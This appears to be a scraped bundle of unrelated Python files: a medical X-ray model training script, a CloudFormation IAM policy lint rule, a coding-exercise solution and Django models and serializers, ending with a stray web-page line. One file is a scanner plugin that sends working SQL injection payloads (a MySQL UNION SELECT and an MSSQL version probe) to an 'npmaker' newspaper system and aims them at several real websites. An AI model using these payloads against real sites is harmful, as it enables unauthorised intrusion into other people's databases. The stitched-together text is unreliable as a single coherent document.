batch_size=BATCH_SIZE,
collate_fn=collate_fn,
num_workers=num_workers)
return ld
def train_helper(train_ld, val_ld, save_path):
"""Execute MedSelect training.
Args:
train_ld (torch.utils.data.DataLoader): dataloader for train data
val_ld (torch.utils.data.DataLoader): dataloader for test data
save_path (string): directory in which checkpoints will be saved
"""
predictor = meanPred(mode = 'cosine')
selector = LSTMSelector(input_size=(512 + USE_ASL*3))
print("\n\nRunning for K=%d" % K)
train_model(train_ld=train_ld,
val_ld=val_ld,
predictor=predictor,
selector=selector,
save_path=save_path,
num_epochs=NUM_EPOCHS,
lr=LEARNING_RATE,
k=K)
if __name__ == '__main__':
prs = argparse.ArgumentParser(description='Train a MedSelect model.')
prs.add_argument('--train_pos_csv', type=str, nargs='?', required=True,
help='Path to training set csv containing data for X-rays that are positive for abnormalities')
prs.add_argument('--train_norm_csv', type=str, nargs='?', required=True,
help='Path to training set csv containing data for X-rays that are positive for No Finding')
prs.add_argument('--val_pos_csv', type=str, nargs='?', required=True,
help='Path to val set csv containing data for X-rays that are positive for abnormalities')
prs.add_argument('--val_norm_csv', type=str, nargs='?', required=True,
help='Path to val set csv containing data for X-rays that are positive for No Finding')
prs.add_argument('--out', type=str, nargs='?', required=True,
help='Path to directory in which checkpoints will be saved')
args = prs.parse_args()
train_pos = args.train_pos_csv
train_norm = args.train_norm_csv
val_pos = args.val_pos_csv
val_norm = args.val_norm_csv
save_path = args.out
train_ld = load_data(train_pos, train_norm, NUM_META_TRAIN_TASKS)
val_ld = load_data(val_pos, val_norm, NUM_META_TEST_TASKS)
train_helper(train_ld, val_ld, save_path)
|
#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name:npmaker数字报漏洞集
#Refer:http://www.2cto.com/Article/201307/231014.html
def assign(service,arg):
if service=="xplus":
return True,arg
def audit(arg):
#mysql
url=arg+"www/index.php?mod=admin&con=deliver&act=view&username=809763517&deliId=-32%20UNION%20SELECT%201,md5(1),3,4,5,6,7,8,9,10,11,12,13--"
code,head,res,errcode,_=curl.curl2(url)
if code==200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
security_hole("mysql: "+url)
else:
#mssql
url=arg+"www/index.php?mod=index&con=Review&act=getallpaper&papertype=scrb%27%20and%20char(71)%252Bchar(65)%252Bchar(79)%252Bchar(74)%252Bchar(73)%252B@@version%3E0--"
code,head,res,errcode,_=curl.curl2(url)
if code==200 and 'GAOJIMicrosoft' in res:
security_hole("mssql: "+url)
if __name__=="__main__":
from dummy import *
audit(assign('xplus','http://paper.fynews.net/')[1])
audit(assign('xplus','http://news.xd56b.com/')[1])
audit(assign('xplus','http://epaper.xsmd.com.cn/')[1]) |
from __future__ import absolute_import, division, print_function
import sys
import inspect
from builtins import (str)
from cloudformation_validator.custom_rules.BaseRule import BaseRule
def lineno():
"""Returns the current line number in our program."""
return str(' - IamManagedPolicyNotResourceRule - caller: '+str(inspect.stack()[1][3])+' - line number: '+str(inspect.currentframe().f_back.f_lineno))
class IamManagedPolicyNotResourceRule(BaseRule):
def __init__(self, cfn_model=None, debug=None):
"""
Initialize IamManagedPolicyNotResourceRule
:param cfn_model:
"""
BaseRule.__init__(self, cfn_model, debug=debug)
def rule_text(self):
"""
Returns rule text
:return:
"""
return 'IAM managed policy should not allow Allow+NotResource'
def rule_type(self):
"""
Returns rule type
:return:
"""
self.type= 'VIOLATION::WARNING'
return 'VIOLATION::WARNING'
def rule_id(self):
"""
Returns rule id
:return:
"""
if self.debug:
print('rule_id'+lineno())
self.id ='W23'
return 'W23'
def audit_impl(self):
"""
Audit
:return: violations
"""
if self.debug:
print('IamManagedPolicyNotResourceRule - audit_impl'+lineno())
violating_policies = []
resources = self.cfn_model.resources_by_type('AWS::IAM::ManagedPolicy')
if len(resources)>0:
for resource in resources:
if self.debug:
print('resource: '+str(resource))
if hasattr(resource,'policy_document'):
if self.debug:
print('has policy document '+lineno())
print('policy document: '+str(resource.policy_document)+lineno())
if resource.policy_document:
if resource.policy_document.allows_not_resource():
if self.debug:
print('has allows not resource')
violating_policies.append(str(resource.logical_resource_id))
else:
if self.debug:
print('does not have policy document'+lineno())
else:
if self.debug:
print('no violating_policies' + lineno())
return violating_policies |
#!/usr/bin/python3
#https://practice.geeksforgeeks.org/problems/first-non-repeating-character-in-a-stream/0
import queue
def sol(arr, n):
"""
Let there be a hash counting the occurence of characters. Push the
character in the Queue as it appears for the first time.
Now, pop the element from the queue only if it differs from the result
else keep using the same result.
We are keeping a track of 'res' because we are using q.get() which
pops the element. We can also check the first element and we need not
keep track of last result
"""
ht = {}
q = queue.Queue(maxsize=n)
cnt = {}
res = arr[0]
for char in arr:
if res == char or res == -1:
res = False
if char in cnt:
cnt[char]+=1
else:
cnt[char] = 1
q.put(char)
if not res:
found = False
while not q.empty():
res = q.get()
if cnt[res] == 1:
found = True
break
if not found:
res = -1
print(res, end=" ")
print()
arr="w l r b b m q b h c d a r z o w k k y h i d d q s c d x r\
j m o w f r x s j y b l d b e f s a r c b y n e c d y g g x x p\
k l o r e l l n m p a p q f w k h o p k m c o q h n w n k u e w h\
s q m g b b u q c l j j i v s w m d k q t b x i x m v t r r b l\
j p t n s n f w z q f j m a f a d r r w s o f s b c n u v q h f\
f b s a q x w p q c a c e h c h z v f r k m l n o z j k p q p x\
r j x k i t z y x a c b h h k i c q c o e n d t o m f g d w d w\
f c g p x i q v k u y t d l c g d e w h t a c i o h o r d t q k v w c s g s p q o q m s b o a g u w n n y q x n z l g d g w"
sol(arr, len(arr)) |
def _add_element(base, index, value):
"""Implementation of += on an array element"""
try:
base[index] += value
except TypeError:
if isinstance(value, int) or isinstance(value, float):
base[index] = _num(base[index]) + value
elif value is None:
base[index] = _num(base[index])
else:
base[index] = _num(base[index]) + _num(value)
return base[index]
|
import uuid
from django.contrib.auth import get_user_model # new
from django.db import models
from django.urls import reverse
class Book(models.Model):
id = models.UUIDField( # new
primary_key=True,
default=uuid.uuid4,
editable=False)
title = models.CharField(max_length=200)
author = models.CharField(max_length=200)
price = models.DecimalField(max_digits=6, decimal_places=2)
def __str__(self):
return self.title
def get_absolute_url(self): # new
return reverse('book_detail', args=[str(self.id)])
class Review(models.Model): # new
book = models.ForeignKey(
Book,
on_delete=models.CASCADE,
related_name='reviews',
)
review = models.CharField(max_length=255)
author = models.ForeignKey(
get_user_model(),
on_delete=models.CASCADE,
)
def __str__(self):
return self.review
|
from .ucsc_base import load_ucsc_exons
__metadata__ = {
'__collection__': 'ucsc_exons',
}
def load_genedoc(self=None):
genedoc_d = load_ucsc_exons()
return genedoc_d
def get_mapping(self=None):
mapping = {
#do not index exons
"exons": {
"type": "object",
"enabled": False
},
#do not index exons_hg19
"exons_hg19": {
"type": "object",
"enabled": False
},
"exons_mm9": {
"type": "object",
"enabled": False
}
}
return mapping
|
from django.contrib.auth import get_user_model
from message_app.models import Message
from rest_framework import serializers
from support_app.tasks import send_new_message_email
from ticket_app.models import Ticket
class CustomUserSerializer(serializers.ModelSerializer):
'''Serializer for an user'''
class Meta:
model = get_user_model()
fields = ['id', 'username', 'email']
class AbstractTicketSerializerr(serializers.ModelSerializer):
author = CustomUserSerializer(read_only=True)
class Meta:
model = Ticket
fields = ('__all__')
read_only_fields = ['title', 'text', 'author', 'created_at']
class SupportTicketUpdateStatusSerializer(AbstractTicketSerializerr):
'''Serializer to update status of ticket'''
pass
class SupportMessageCreateSerializer(serializers.ModelSerializer):
'''Serializer to create messages in diffrenets ticket by a support'''
author = CustomUserSerializer(read_only=True)
class Meta:
model = Message
fields = '__all__'
read_only_fields = ['created_at']
def validate(self, data):
# Check that child is in the same ticket as parent
if data.get('parent'):
if data.get('parent').ticket != data.get('ticket'):
raise serializers.ValidationError('Child message must be in the same ticket as parent message!')
return data
def create(self, validated_data):
ticket = Ticket.objects.get(pk=validated_data.get('ticket').id)
if ticket.author.email:
send_new_message_email.delay(ticket.author.email, ticket.title, validated_data.get('text'))
return super(SupportMessageCreateSerializer, self).create(validated_data)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.